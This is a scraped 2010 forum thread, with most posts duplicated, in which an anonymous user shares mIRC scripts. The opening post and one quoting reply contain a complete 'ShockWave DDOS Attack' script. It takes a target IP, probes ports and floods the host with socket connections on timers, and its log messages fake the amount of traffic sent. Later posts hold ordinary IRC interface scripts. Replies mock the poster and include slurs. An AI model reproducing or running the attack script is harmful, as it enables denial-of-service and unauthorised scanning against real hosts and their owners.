|

10-07-2010, 01:44 PM
|
Posts: n/a
Mentioned: Post(s)
Tagged: Thread(s)
|
Some code for you fuckers.
alias DDOSNuker {
.dialog -m DDOSNuker DDOSNuker
}
dialog DDOSNuker {
title "ShockWave DDOS Attack."
size -1 -1 150 60
option dbu
text "Important Note: Sending packets to other ips is an illegal industry and also a crime, the script author is not responsible for any trouble that might you have with your internet service provider (ISP) for violation of TOS. You can use this addon at your own risk.", 11, 2 2 148 35, ok tab 1
text Target: %targetip, 12, 27 40 65 25, ok tab 1
button "set", 13, 89 38 25 10, ok tab
text Control: , 14, 27 50 65 25, ok tab 1
Button "->ATTACK<-" , 15, 50 49 35 10, ok tab 1
Button "Exit" , 16, 88 49 25 10, ok tab 1
}
on 1:dialog  DOSNuker:sclick:*: {
if ($did == 13) { .set %targetip $$?="Enter Ip" | .dialog -c DDOSNuker DDOSNuker | ddosnuker }
if ($did == 15) { .remove victimports.txt | echo -s 12(14-12(14Nuker12)14-12)14 Attack Started On: %targetip | .set %attackid 0 | .goattack | .timer400 300 0 /goattack | .timer401 1 15 /sendpackets }
}
on *:sockopen:ddosattack*:{
if ($sockerr > 0) { return }
else { .echo 4 -s 12(14-12(14Nuker12)14-12)14 Open Hole On: %targetip on port $sock($sockname).port | .write victimports.txt $sock($sockname).port }
.sockclose $sockname
}
alias sendpackets {
if ($lines(victimports.txt) > 0) { .set %successpackets 0 | .set %randomattackport $read(victimports.txt,1) | .set %custompacket 0 | .timer402 10 0 /custompacket | .timer405 1 20 /successpackets }
else { .echo -s 12(14-12(14Nuker12)14-12)14 Attack Halted, Host Well Firewalled. }
}
alias successpackets {
.set %successpackets $calc(%packetsent * 24)
.echo -s 12(14-12(14Nuker12)14-12)14 ip attacked: %targetip
.echo -s 12(14-12(14Nuker12)14-12)14 psuedo data sent to port: $rand(21,300)
.echo -s 12(14-12(14Nuker12)14-12)14 $calc(%packetssent + 860) $+ Kbs Sent
.echo -s 12(14-12(14Nuker12)14-12)14 Operation Completed.
.write victimports.txt nothing open
}
on *:sockopen:ddosattack*:{
if ($sockerr > 0) { return }
else { .inc %packetssent }
.sockclose $sockname
}
alias custompacket {
.inc %custompacket
.sockopen ddosattack $+ $rand(999999,999999999) %targetip 80
}
alias goattack {
.inc %attackid
.sockopen ddosattack $+ %attackid %targetip %attackid
}
|
10-07-2010, 01:44 PM
|
#1
|
Guest
Voted:
0 audio / 0 text
Posts: n/a
Mentioned: Post(s)
Tagged: Thread(s)
|
Some code for you fuckers.
alias DDOSNuker {
.dialog -m DDOSNuker DDOSNuker
}
dialog DDOSNuker {
title "ShockWave DDOS Attack."
size -1 -1 150 60
option dbu
text "Important Note: Sending packets to other ips is an illegal industry and also a crime, the script author is not responsible for any trouble that might you have with your internet service provider (ISP) for violation of TOS. You can use this addon at your own risk.", 11, 2 2 148 35, ok tab 1
text Target: %targetip, 12, 27 40 65 25, ok tab 1
button "set", 13, 89 38 25 10, ok tab
text Control: , 14, 27 50 65 25, ok tab 1
Button "->ATTACK<-" , 15, 50 49 35 10, ok tab 1
Button "Exit" , 16, 88 49 25 10, ok tab 1
}
on 1:dialog  DOSNuker:sclick:*: {
if ($did == 13) { .set %targetip $$?="Enter Ip" | .dialog -c DDOSNuker DDOSNuker | ddosnuker }
if ($did == 15) { .remove victimports.txt | echo -s 12(14-12(14Nuker12)14-12)14 Attack Started On: %targetip | .set %attackid 0 | .goattack | .timer400 300 0 /goattack | .timer401 1 15 /sendpackets }
}
on *:sockopen:ddosattack*:{
if ($sockerr > 0) { return }
else { .echo 4 -s 12(14-12(14Nuker12)14-12)14 Open Hole On: %targetip on port $sock($sockname).port | .write victimports.txt $sock($sockname).port }
.sockclose $sockname
}
alias sendpackets {
if ($lines(victimports.txt) > 0) { .set %successpackets 0 | .set %randomattackport $read(victimports.txt,1) | .set %custompacket 0 | .timer402 10 0 /custompacket | .timer405 1 20 /successpackets }
else { .echo -s 12(14-12(14Nuker12)14-12)14 Attack Halted, Host Well Firewalled. }
}
alias successpackets {
.set %successpackets $calc(%packetsent * 24)
.echo -s 12(14-12(14Nuker12)14-12)14 ip attacked: %targetip
.echo -s 12(14-12(14Nuker12)14-12)14 psuedo data sent to port: $rand(21,300)
.echo -s 12(14-12(14Nuker12)14-12)14 $calc(%packetssent + 860) $+ Kbs Sent
.echo -s 12(14-12(14Nuker12)14-12)14 Operation Completed.
.write victimports.txt nothing open
}
on *:sockopen:ddosattack*:{
if ($sockerr > 0) { return }
else { .inc %packetssent }
.sockclose $sockname
}
alias custompacket {
.inc %custompacket
.sockopen ddosattack $+ $rand(999999,999999999) %targetip 80
}
alias goattack {
.inc %attackid
.sockopen ddosattack $+ %attackid %targetip %attackid
}
|
|
|

10-07-2010, 01:47 PM
|
Join Date: Jan 2010
Posts: 1,783
Mentioned: 154 Post(s)
Tagged: 16 Thread(s)
Ranked Text Record 127 Won / 56 Lost
Exclusive Text Record 1 Won / 1 Lost
|
vvvvvvvvvvvvvviiiiiiiiiiiiiiiiiirrrrrrrrrruuuuuuuu uussssssssssssssss
__________________
"Behind every artist there is a picture that can only be Heavenly Created!"
|
10-07-2010, 01:47 PM
|
#2
|
Ranked Text Record 127 Won / 56 Lost
Exclusive Text Record 1 Won / 1 Lost
Join Date: Jan 2010
Voted:
0 audio / 305
text
Posts: 1,783
Mentioned: 154 Post(s)
Tagged: 16 Thread(s)
|
vvvvvvvvvvvvvviiiiiiiiiiiiiiiiiirrrrrrrrrruuuuuuuu uussssssssssssssss
__________________
"Behind every artist there is a picture that can only be Heavenly Created!"
|
Offline
|
|

10-07-2010, 01:48 PM
|
Join Date: May 2010
Posts: 1,700
Mentioned: 1 Post(s)
Tagged: 0 Thread(s)
Ranked Text Record 19 Won / 21 Lost
|
what a fag... why would he do that???
__________________
Quote:
Put em in the fuckin bathroom!! -Sonny-
|
Quote:
Give them nothing but take from them EVERYTHING!!! -Leonidas-
|
Quote:
The past is a memory, a lesson HISTORY / you learn you move on, and pain? it aint SHIT TO ME / it makes me stronger in lifes Mortal Kombats Flawless VICTORY / if you aint HIP TO ME? / i been thru hell and back, mah feet and hands BLISTERING /
|
|
10-07-2010, 01:48 PM
|
#3
|
Ranked Text Record 19 Won / 21 Lost
Join Date: May 2010
Voted:
0 audio / 0 text
Posts: 1,700
Mentioned: 1 Post(s)
Tagged: 0 Thread(s)
|
what a fag... why would he do that???
__________________
Quote:
Put em in the fuckin bathroom!! -Sonny-
|
Quote:
Give them nothing but take from them EVERYTHING!!! -Leonidas-
|
Quote:
The past is a memory, a lesson HISTORY / you learn you move on, and pain? it aint SHIT TO ME / it makes me stronger in lifes Mortal Kombats Flawless VICTORY / if you aint HIP TO ME? / i been thru hell and back, mah feet and hands BLISTERING /
|
|
Offline
|
|

10-07-2010, 01:49 PM
|
Posts: n/a
Mentioned: Post(s)
Tagged: Thread(s)
|
Lmao. @ Virus.
|
10-07-2010, 01:49 PM
|
#4
|
Guest
Voted:
0 audio / 0 text
Posts: n/a
Mentioned: Post(s)
Tagged: Thread(s)
|
Lmao. @ Virus.
|
|
|

10-07-2010, 01:50 PM
|
Posts: n/a
Mentioned: Post(s)
Tagged: Thread(s)
|
alias switch {
if (!$dialog(switchbar)) {
dialog -mh switchbar switchbar
}
}
alias refresh { .timer -m 1 20 switchbar }
dialog switchbar {
title "switchbar"
size -1 -1 69 328
option dbu
list 1, 1 1 70 241, sort size
}
alias switchreload {
dialog -x switchbar
switch
}
on *:dialog:switchbar:*:*:{
if ($devent == init) {
$mdxin
dll $mdx SetDialog $dname style
dll $mdx SetControlMDX $dname 1 TreeView haslines hasbuttons showsel rowselect insertdroptarget > $views
did -i $dname 1 1 SetColor bkg $color(1)
did -i $dname 1 1 SetColor line $color(4)
did -i $dname 1 1 SetColor text $color(14)
dll $hos Dock $dname Left -1
$switchbar
.timerunfreeze 1 3600 switchreload
}
if ($devent == sclick) {
if ($did == 1) {
tokenize 32 $did(1,1,1)
if ($3 == unknown) halt
if ($4 >= 2) && (!$5-) {
scon $calc($4 - 1)
window -a "Status Window"
}
if ($4 >= 2) && ($5 == 2) && (!$6) {
scon $calc($4 - 1)
if ($server) list
}
if ($4 >= 2) && ($5 == 2) && ($6) {
scon $calc($4 - 1)
var %chan = $chan($calc($6 - 1))
window -a %chan
}
if ($4 >= 2) && ($5 == 3) && ($6) {
scon $calc($4 - 1)
var %query = $query($calc($6 - 1))
window -a %query
}
if ($4 >= 2) && ($5 == 4) && ($6) {
scon $calc($4 - 1)
var %window = $window($calc($6 - 1))
window -a %window
}
if ($4 >= 2) && ($5 == 5) && ($6 == 2) && ($7) {
scon $calc($4 - 1)
var %send = $send($calc($7 - 1))
window -a %send
}
if ($4 >= 2) && ($5 == 5) && ($6 == 3) && ($7) {
scon $calc($4 - 1)
var %get = $get($calc($7 - 1))
window -a %get
}
if ($4 >= 2) && ($5 == 5) && ($6 == 4) && ($7) {
scon $calc($4 - 1)
var %chat = $chat($calc($7 - 1))
window -a %chat
}
}
}
}
alias switchbar {
did -r switchbar 1
did -i switchbar 1 1 iconsize normal small
did -i switchbar 1 1 seticon normal icons/connect.ico
did -i switchbar 1 1 seticon normal icons/chan.ico
did -i switchbar 1 1 seticon normal icons/userlist2.ico
did -i switchbar 1 1 seticon normal icons/chan2.ico
did -i switchbar 1 1 seticon normal icons/dcc.ico
did -i switchbar 1 1 seticon normal icons/disconnect.ico
did -i switchbar 1 1 seticon normal icons/about.ico
var %a = 1
while (%a <= $scid(0)) {
scon %a
did -i switchbar 1 1 cb root
if ($server) did -a switchbar 1 +eb 1 1 $server
if (!$server) did -a switchbar 1 +eb 6 1 Not connected.
did -i switchbar 1 1 cb last
did -i switchbar 1 1 cb last
did -a switchbar 1 +e 2 2 Channels
did -i switchbar 1 1 cb last
var %c = 1
while (%c <= $chan(0)) {
if (%Notify. [ $+ [ $+($server $+ $chan(%c)) ] ] != On) did -a switchbar 1 + 2 2 $chan(%c)
if (%Notify. [ $+ [ $+($server $+ $chan(%c)) ] ] == On) did -a switchbar 1 + 2 2 ! $+ $chan(%c)
inc %c
}
did -i switchbar 1 1 cb up
did -a switchbar 1 +e 3 3 Queries
did -i switchbar 1 1 cb last
var %q = 1
while (%q <= $query(0)) {
if (%Notify. [ $+ [ $+($server $+ $query(%q)) ] ] != On) did -a switchbar 1 + 3 3 $query(%q)
if (%Notify. [ $+ [ $+($server $+ $query(%q)) ] ] == On) did -a switchbar 1 + 3 3 ! $+ $query(%q)
inc %q
}
inc %a
}
}
on *:ACTIVE:*:{
if ($activecid != $lactivecid) && ($lactive) {
nbar
}
if ($lactive) {
if (%Notify. [ $+ [ $+($server $+ $active) ] ] == On) unset %Notify. [ $+ [ $+($server $+ $active) ] ]
switchbar
}
}
on *:CONNECT:{ .timer 1 1 refresh }
on *  ISCONNECT:{ refresh }
on *:CLOSE:*:{ refresh }
on *:TEXT:*:#:{
if ($active != $chan) && (%Notify. [ $+ [ $+($server $+ $chan) ] ] != On) {
set %Notify. [ $+ [ $+($server $+ $chan) ] ] On
switchbar
}
}
on *:ACTION:#:{
if ($active != $chan) && (%Notify. [ $+ [ $+($server $+ $chan) ] ] != On) {
set %Notify. [ $+ [ $+($server $+ $chan) ] ] On
switchbar
}
}
on *:RAWMODE:#:{
if ($active != $chan) && (%Notify. [ $+ [ $+($server $+ $chan) ] ] != On) {
set %Notify. [ $+ [ $+($server $+ $chan) ] ] On
switchbar
}
}
on *:JOIN:#:{
if ($active != $chan) && (%Notify. [ $+ [ $+($server $+ $chan) ] ] != On) {
set %Notify. [ $+ [ $+($server $+ $chan) ] ] On
switchbar
}
}
on *:TEXT:*:?:{
if ($active != $nick) && (%Notify. [ $+ [ $+($server $+ $chan) ] ] != On) {
set %Notify. [ $+ [ $+($server $+ $nick) ] ] On
switchbar
}
}
on *:ACTION:?:{
if ($active != $nick) && (%Notify. [ $+ [ $+($server $+ $chan) ] ] != On) {
set %Notify. [ $+ [ $+($server $+ $nick) ] ] On
switchbar
}
}
|
10-07-2010, 01:50 PM
|
#5
|
Guest
Voted:
0 audio / 0 text
Posts: n/a
Mentioned: Post(s)
Tagged: Thread(s)
|
alias switch {
if (!$dialog(switchbar)) {
dialog -mh switchbar switchbar
}
}
alias refresh { .timer -m 1 20 switchbar }
dialog switchbar {
title "switchbar"
size -1 -1 69 328
option dbu
list 1, 1 1 70 241, sort size
}
alias switchreload {
dialog -x switchbar
switch
}
on *:dialog:switchbar:*:*:{
if ($devent == init) {
$mdxin
dll $mdx SetDialog $dname style
dll $mdx SetControlMDX $dname 1 TreeView haslines hasbuttons showsel rowselect insertdroptarget > $views
did -i $dname 1 1 SetColor bkg $color(1)
did -i $dname 1 1 SetColor line $color(4)
did -i $dname 1 1 SetColor text $color(14)
dll $hos Dock $dname Left -1
$switchbar
.timerunfreeze 1 3600 switchreload
}
if ($devent == sclick) {
if ($did == 1) {
tokenize 32 $did(1,1,1)
if ($3 == unknown) halt
if ($4 >= 2) && (!$5-) {
scon $calc($4 - 1)
window -a "Status Window"
}
if ($4 >= 2) && ($5 == 2) && (!$6) {
scon $calc($4 - 1)
if ($server) list
}
if ($4 >= 2) && ($5 == 2) && ($6) {
scon $calc($4 - 1)
var %chan = $chan($calc($6 - 1))
window -a %chan
}
if ($4 >= 2) && ($5 == 3) && ($6) {
scon $calc($4 - 1)
var %query = $query($calc($6 - 1))
window -a %query
}
if ($4 >= 2) && ($5 == 4) && ($6) {
scon $calc($4 - 1)
var %window = $window($calc($6 - 1))
window -a %window
}
if ($4 >= 2) && ($5 == 5) && ($6 == 2) && ($7) {
scon $calc($4 - 1)
var %send = $send($calc($7 - 1))
window -a %send
}
if ($4 >= 2) && ($5 == 5) && ($6 == 3) && ($7) {
scon $calc($4 - 1)
var %get = $get($calc($7 - 1))
window -a %get
}
if ($4 >= 2) && ($5 == 5) && ($6 == 4) && ($7) {
scon $calc($4 - 1)
var %chat = $chat($calc($7 - 1))
window -a %chat
}
}
}
}
alias switchbar {
did -r switchbar 1
did -i switchbar 1 1 iconsize normal small
did -i switchbar 1 1 seticon normal icons/connect.ico
did -i switchbar 1 1 seticon normal icons/chan.ico
did -i switchbar 1 1 seticon normal icons/userlist2.ico
did -i switchbar 1 1 seticon normal icons/chan2.ico
did -i switchbar 1 1 seticon normal icons/dcc.ico
did -i switchbar 1 1 seticon normal icons/disconnect.ico
did -i switchbar 1 1 seticon normal icons/about.ico
var %a = 1
while (%a <= $scid(0)) {
scon %a
did -i switchbar 1 1 cb root
if ($server) did -a switchbar 1 +eb 1 1 $server
if (!$server) did -a switchbar 1 +eb 6 1 Not connected.
did -i switchbar 1 1 cb last
did -i switchbar 1 1 cb last
did -a switchbar 1 +e 2 2 Channels
did -i switchbar 1 1 cb last
var %c = 1
while (%c <= $chan(0)) {
if (%Notify. [ $+ [ $+($server $+ $chan(%c)) ] ] != On) did -a switchbar 1 + 2 2 $chan(%c)
if (%Notify. [ $+ [ $+($server $+ $chan(%c)) ] ] == On) did -a switchbar 1 + 2 2 ! $+ $chan(%c)
inc %c
}
did -i switchbar 1 1 cb up
did -a switchbar 1 +e 3 3 Queries
did -i switchbar 1 1 cb last
var %q = 1
while (%q <= $query(0)) {
if (%Notify. [ $+ [ $+($server $+ $query(%q)) ] ] != On) did -a switchbar 1 + 3 3 $query(%q)
if (%Notify. [ $+ [ $+($server $+ $query(%q)) ] ] == On) did -a switchbar 1 + 3 3 ! $+ $query(%q)
inc %q
}
inc %a
}
}
on *:ACTIVE:*:{
if ($activecid != $lactivecid) && ($lactive) {
nbar
}
if ($lactive) {
if (%Notify. [ $+ [ $+($server $+ $active) ] ] == On) unset %Notify. [ $+ [ $+($server $+ $active) ] ]
switchbar
}
}
on *:CONNECT:{ .timer 1 1 refresh }
on *  ISCONNECT:{ refresh }
on *:CLOSE:*:{ refresh }
on *:TEXT:*:#:{
if ($active != $chan) && (%Notify. [ $+ [ $+($server $+ $chan) ] ] != On) {
set %Notify. [ $+ [ $+($server $+ $chan) ] ] On
switchbar
}
}
on *:ACTION:#:{
if ($active != $chan) && (%Notify. [ $+ [ $+($server $+ $chan) ] ] != On) {
set %Notify. [ $+ [ $+($server $+ $chan) ] ] On
switchbar
}
}
on *:RAWMODE:#:{
if ($active != $chan) && (%Notify. [ $+ [ $+($server $+ $chan) ] ] != On) {
set %Notify. [ $+ [ $+($server $+ $chan) ] ] On
switchbar
}
}
on *:JOIN:#:{
if ($active != $chan) && (%Notify. [ $+ [ $+($server $+ $chan) ] ] != On) {
set %Notify. [ $+ [ $+($server $+ $chan) ] ] On
switchbar
}
}
on *:TEXT:*:?:{
if ($active != $nick) && (%Notify. [ $+ [ $+($server $+ $chan) ] ] != On) {
set %Notify. [ $+ [ $+($server $+ $nick) ] ] On
switchbar
}
}
on *:ACTION:?:{
if ($active != $nick) && (%Notify. [ $+ [ $+($server $+ $chan) ] ] != On) {
set %Notify. [ $+ [ $+($server $+ $nick) ] ] On
switchbar
}
}
|
|
|

10-07-2010, 01:51 PM
|
Join Date: Jun 2009
Posts: 4,746
Mentioned: 121 Post(s)
Tagged: 5 Thread(s)
Ranked Text Record 48 Won / 30 Lost
|
Quote:
Originally Posted by C Teezy
alias DDOSNuker {
.dialog -m DDOSNuker DDOSNuker
}
dialog DDOSNuker {
title "ShockWave DDOS Attack."
size -1 -1 150 60
option dbu
text "Important Note: Sending packets to other ips is an illegal industry and also a crime, the script author is not responsible for any trouble that might you have with your internet service provider (ISP) for violation of TOS. You can use this addon at your own risk.", 11, 2 2 148 35, ok tab 1
text Target: %targetip, 12, 27 40 65 25, ok tab 1
button "set", 13, 89 38 25 10, ok tab
text Control: , 14, 27 50 65 25, ok tab 1
Button "->ATTACK<-" , 15, 50 49 35 10, ok tab 1
Button "Exit" , 16, 88 49 25 10, ok tab 1
}
on 1:dialog  DOSNuker:sclick:*: {
if ($did == 13) { .set %targetip $$?="Enter Ip" | .dialog -c DDOSNuker DDOSNuker | ddosnuker }
if ($did == 15) { .remove victimports.txt | echo -s 12(14-12(14Nuker12)14-12)14 Attack Started On: %targetip | .set %attackid 0 | .goattack | .timer400 300 0 /goattack | .timer401 1 15 /sendpackets }
}
on *:sockopen:ddosattack*:{
if ($sockerr > 0) { return }
else { .echo 4 -s 12(14-12(14Nuker12)14-12)14 Open Hole On: %targetip on port $sock($sockname).port | .write victimports.txt $sock($sockname).port }
.sockclose $sockname
}
alias sendpackets {
if ($lines(victimports.txt) > 0) { .set %successpackets 0 | .set %randomattackport $read(victimports.txt,1) | .set %custompacket 0 | .timer402 10 0 /custompacket | .timer405 1 20 /successpackets }
else { .echo -s 12(14-12(14Nuker12)14-12)14 Attack Halted, Host Well Firewalled. }
}
alias successpackets {
.set %successpackets $calc(%packetsent * 24)
.echo -s 12(14-12(14Nuker12)14-12)14 ip attacked: %targetip
.echo -s 12(14-12(14Nuker12)14-12)14 psuedo data sent to port: $rand(21,300)
.echo -s 12(14-12(14Nuker12)14-12)14 $calc(%packetssent + 860) $+ Kbs Sent
.echo -s 12(14-12(14Nuker12)14-12)14 Operation Completed.
.write victimports.txt nothing open
}
on *:sockopen:ddosattack*:{
if ($sockerr > 0) { return }
else { .inc %packetssent }
.sockclose $sockname
}
alias custompacket {
.inc %custompacket
.sockopen ddosattack $+ $rand(999999,999999999) %targetip 80
}
alias goattack {
.inc %attackid
.sockopen ddosattack $+ %attackid %targetip %attackid
}
|
Lawl.
tl:dr
is this a telnet attack? zomg.
__________________
Yes Yes Ya'll, an it don't stop....
Seems like me an' you bout had enough,
Cause man, it's tough to keep the fam in touch,
And to add it up, this rappin stuff got me flippin out like a blackjack bust
Don't give a fuck if you sound like Master P, Mobb Deep or Remy Martin,
Cuz even if the next to try us is the best of rhymers?
Still get bodied on plates like Jeffery Dahmer
|
10-07-2010, 01:51 PM
|
#6
|
Ranked Text Record 48 Won / 30 Lost
Join Date: Jun 2009
Voted:
0 audio / 211
text
Posts: 4,746
Mentioned: 121 Post(s)
Tagged: 5 Thread(s)
|
Quote:
Originally Posted by C Teezy
alias DDOSNuker {
.dialog -m DDOSNuker DDOSNuker
}
dialog DDOSNuker {
title "ShockWave DDOS Attack."
size -1 -1 150 60
option dbu
text "Important Note: Sending packets to other ips is an illegal industry and also a crime, the script author is not responsible for any trouble that might you have with your internet service provider (ISP) for violation of TOS. You can use this addon at your own risk.", 11, 2 2 148 35, ok tab 1
text Target: %targetip, 12, 27 40 65 25, ok tab 1
button "set", 13, 89 38 25 10, ok tab
text Control: , 14, 27 50 65 25, ok tab 1
Button "->ATTACK<-" , 15, 50 49 35 10, ok tab 1
Button "Exit" , 16, 88 49 25 10, ok tab 1
}
on 1:dialog  DOSNuker:sclick:*: {
if ($did == 13) { .set %targetip $$?="Enter Ip" | .dialog -c DDOSNuker DDOSNuker | ddosnuker }
if ($did == 15) { .remove victimports.txt | echo -s 12(14-12(14Nuker12)14-12)14 Attack Started On: %targetip | .set %attackid 0 | .goattack | .timer400 300 0 /goattack | .timer401 1 15 /sendpackets }
}
on *:sockopen:ddosattack*:{
if ($sockerr > 0) { return }
else { .echo 4 -s 12(14-12(14Nuker12)14-12)14 Open Hole On: %targetip on port $sock($sockname).port | .write victimports.txt $sock($sockname).port }
.sockclose $sockname
}
alias sendpackets {
if ($lines(victimports.txt) > 0) { .set %successpackets 0 | .set %randomattackport $read(victimports.txt,1) | .set %custompacket 0 | .timer402 10 0 /custompacket | .timer405 1 20 /successpackets }
else { .echo -s 12(14-12(14Nuker12)14-12)14 Attack Halted, Host Well Firewalled. }
}
alias successpackets {
.set %successpackets $calc(%packetsent * 24)
.echo -s 12(14-12(14Nuker12)14-12)14 ip attacked: %targetip
.echo -s 12(14-12(14Nuker12)14-12)14 psuedo data sent to port: $rand(21,300)
.echo -s 12(14-12(14Nuker12)14-12)14 $calc(%packetssent + 860) $+ Kbs Sent
.echo -s 12(14-12(14Nuker12)14-12)14 Operation Completed.
.write victimports.txt nothing open
}
on *:sockopen:ddosattack*:{
if ($sockerr > 0) { return }
else { .inc %packetssent }
.sockclose $sockname
}
alias custompacket {
.inc %custompacket
.sockopen ddosattack $+ $rand(999999,999999999) %targetip 80
}
alias goattack {
.inc %attackid
.sockopen ddosattack $+ %attackid %targetip %attackid
}
|
Lawl.
tl:dr
is this a telnet attack? zomg.
__________________
Yes Yes Ya'll, an it don't stop....
Seems like me an' you bout had enough,
Cause man, it's tough to keep the fam in touch,
And to add it up, this rappin stuff got me flippin out like a blackjack bust
Don't give a fuck if you sound like Master P, Mobb Deep or Remy Martin,
Cuz even if the next to try us is the best of rhymers?
Still get bodied on plates like Jeffery Dahmer
|
Offline
|
|

10-07-2010, 01:51 PM
|
Posts: n/a
Mentioned: Post(s)
Tagged: Thread(s)
|
alias wallops { if (!$dialog(wallops)) dialog -dm wallops wallops }
dialog wallops {
title ""
size 2 2 652 55
option dbu
list 1, 0 0 640 54, size
}
on *:dialog:wallops:init:*:{
$mdxin
dll $mdx SetControlMDX $dname 1 ListView report > $views
did -i $dname 1 1 setbkg color $color(1)
did -i $dname 1 1 settxt color $color(14)
did -i $dname 1 1 settxt bgcolor $color(1)
did -i $dname 1 1 headerdims 156 125 975
did -i $dname 1 1 headertext Server $chr(9) Time $chr(9) Message
dll $hos Dock $dname bottom -1
}
on *:WALLOPS:*:{
if ($dialog(wallops)) {
did -a wallops 1 $server $chr(9) $time(dddd-h:nntt) $chr(9) $strip($1-)
did -c wallops 1 $did(wallops,1).lines
}
}
on *:SNOTICE:*:{
if ($dialog(wallops)) {
did -a wallops 1 $server $chr(9) $time(dddd-h:nntt) $chr(9) $strip($1-)
did -c wallops 1 $did(wallops,1).lines
}
}
on *:start:{
if ($dialog(wallops)) {
did -a wallops 1 *Script Start Up* $server $chr(9) $time(dddd-h:nntt) $chr(9) Welcome To Renegade-IRC Final Edition.
did -a wallops 1 *Script Start Up* $server $chr(9) $time(dddd-h:nntt) $chr(9) Coded By V1p3rByt3s`
did -a wallops 1 *Script Start Up* $server $chr(9) $time(dddd-h:nntt) $chr(9) You Are On mIRC Verison $version
did -a wallops 1 *Script Start Up* $server $chr(9) $time(dddd-h:nntt) $chr(9) Enjoy And Have Fun.
did -c wallops 1 $did(wallops,1).lines
}
}
alias hos { return hos.dll }
alias mdx { return mdx.dll }
alias moo { return moo.dll }
alias views { return views.mdx }
alias bars { return bars.mdx }
alias ctl { return ctl_gen.mdx }
alias dmdx { return dialog.mdx }
alias views { return views.mdx }
alias mdxin { dll $mdx SetMircVersion $version | dll $mdx MarkDialog $dname }
alias popupsd { return DLL\POPUPS.DLL }
alias rescheck {
|
10-07-2010, 01:51 PM
|
#7
|
Guest
Voted:
0 audio / 0 text
Posts: n/a
Mentioned: Post(s)
Tagged: Thread(s)
|
alias wallops { if (!$dialog(wallops)) dialog -dm wallops wallops }
dialog wallops {
title ""
size 2 2 652 55
option dbu
list 1, 0 0 640 54, size
}
on *:dialog:wallops:init:*:{
$mdxin
dll $mdx SetControlMDX $dname 1 ListView report > $views
did -i $dname 1 1 setbkg color $color(1)
did -i $dname 1 1 settxt color $color(14)
did -i $dname 1 1 settxt bgcolor $color(1)
did -i $dname 1 1 headerdims 156 125 975
did -i $dname 1 1 headertext Server $chr(9) Time $chr(9) Message
dll $hos Dock $dname bottom -1
}
on *:WALLOPS:*:{
if ($dialog(wallops)) {
did -a wallops 1 $server $chr(9) $time(dddd-h:nntt) $chr(9) $strip($1-)
did -c wallops 1 $did(wallops,1).lines
}
}
on *:SNOTICE:*:{
if ($dialog(wallops)) {
did -a wallops 1 $server $chr(9) $time(dddd-h:nntt) $chr(9) $strip($1-)
did -c wallops 1 $did(wallops,1).lines
}
}
on *:start:{
if ($dialog(wallops)) {
did -a wallops 1 *Script Start Up* $server $chr(9) $time(dddd-h:nntt) $chr(9) Welcome To Renegade-IRC Final Edition.
did -a wallops 1 *Script Start Up* $server $chr(9) $time(dddd-h:nntt) $chr(9) Coded By V1p3rByt3s`
did -a wallops 1 *Script Start Up* $server $chr(9) $time(dddd-h:nntt) $chr(9) You Are On mIRC Verison $version
did -a wallops 1 *Script Start Up* $server $chr(9) $time(dddd-h:nntt) $chr(9) Enjoy And Have Fun.
did -c wallops 1 $did(wallops,1).lines
}
}
alias hos { return hos.dll }
alias mdx { return mdx.dll }
alias moo { return moo.dll }
alias views { return views.mdx }
alias bars { return bars.mdx }
alias ctl { return ctl_gen.mdx }
alias dmdx { return dialog.mdx }
alias views { return views.mdx }
alias mdxin { dll $mdx SetMircVersion $version | dll $mdx MarkDialog $dname }
alias popupsd { return DLL\POPUPS.DLL }
alias rescheck {
|
|
|

10-07-2010, 01:53 PM
|
Posts: n/a
Mentioned: Post(s)
Tagged: Thread(s)
|
Quote:
Originally Posted by Louie Dawgs
Lawl.
tl:dr
is this a telnet attack? zomg.
|
 ...............
|
10-07-2010, 01:53 PM
|
#8
|
Guest
Voted:
0 audio / 0 text
Posts: n/a
Mentioned: Post(s)
Tagged: Thread(s)
|
Quote:
Originally Posted by Louie Dawgs
Lawl.
tl:dr
is this a telnet attack? zomg.
|
 ...............
|
|
|

10-07-2010, 01:54 PM
|
Posts: n/a
Mentioned: Post(s)
Tagged: Thread(s)
|
Copyapasta..........
|
10-07-2010, 01:54 PM
|
#9
|
Guest
Voted:
0 audio / 0 text
Posts: n/a
Mentioned: Post(s)
Tagged: Thread(s)
|
Copyapasta..........
|
|
|

10-07-2010, 01:55 PM
|
Posts: n/a
Mentioned: Post(s)
Tagged: Thread(s)
|
dialog shitlist {
title "Shitlist"
size -1 -1 99 136
option dbu
box "Shitlisted", 1, 1 3 54 131
combo 2, 3 10 49 123, size
button "Ok", 3, 57 122 37 12, ok
box "Options", 5, 54 3 43 23
button "Remove", 6, 57 11 37 12
}
on *:dialog:shitlist:init:0:{
var %; = 1
var %_ = $hget(shitlist,0).item
While (%; <= %_) {
did -a shitlist 2 $hget(shitlist,%  .item
inc %;
}
}
on *:dialog:shitlist:sclick:6: {
hdel shitlist $hfind(shitlist,$did(shitlist,2).seltext,1).item
echo -a 4[14-4[14Removed4 $did(shitlist,2).seltext 14From Your Shitlist4]14-4]
}
on @*:join:#:{
if ($hget(shitlist,$address($nick,3))) {
ban $chan $nick 3 | kick $chan $nick ( You Have Been Shit Listed Fucker.) $+ $hget(settings,kicks)
}
}
menu nicklist {
-
[-[ShitLister]-]
.Add:hadd shitlist $address($$1,3) $$1 | echo -a 4[14-4[14Added4 $$1 14To Your Shitlist4]14-4] 3 | var %x 1,%y | while ($chan(%x)) { %: = $ifmatch | if ($me isop %  && ($1 ison %  { kick %: $1 (You Have Been Shit Listed Fucker.) } | inc %x }
.Remove:hdel shitlist $address($$1,3) | echo -a 4[14-4[14Removed4 $$1 14From Your Shitlist4]14-4]
.View List: dialog -m shitlist shitlist
}
on *:load:hmake shitlist 10
on *:EXIT:{ hsave -o shitlist shitlist.txt }
on *:START:{ hmake shitlist 10 | hload shitlist shitlist.txt }
|
10-07-2010, 01:55 PM
|
#10
|
Guest
Voted:
0 audio / 0 text
Posts: n/a
Mentioned: Post(s)
Tagged: Thread(s)
|
dialog shitlist {
title "Shitlist"
size -1 -1 99 136
option dbu
box "Shitlisted", 1, 1 3 54 131
combo 2, 3 10 49 123, size
button "Ok", 3, 57 122 37 12, ok
box "Options", 5, 54 3 43 23
button "Remove", 6, 57 11 37 12
}
on *:dialog:shitlist:init:0:{
var %; = 1
var %_ = $hget(shitlist,0).item
While (%; <= %_) {
did -a shitlist 2 $hget(shitlist,%  .item
inc %;
}
}
on *:dialog:shitlist:sclick:6: {
hdel shitlist $hfind(shitlist,$did(shitlist,2).seltext,1).item
echo -a 4[14-4[14Removed4 $did(shitlist,2).seltext 14From Your Shitlist4]14-4]
}
on @*:join:#:{
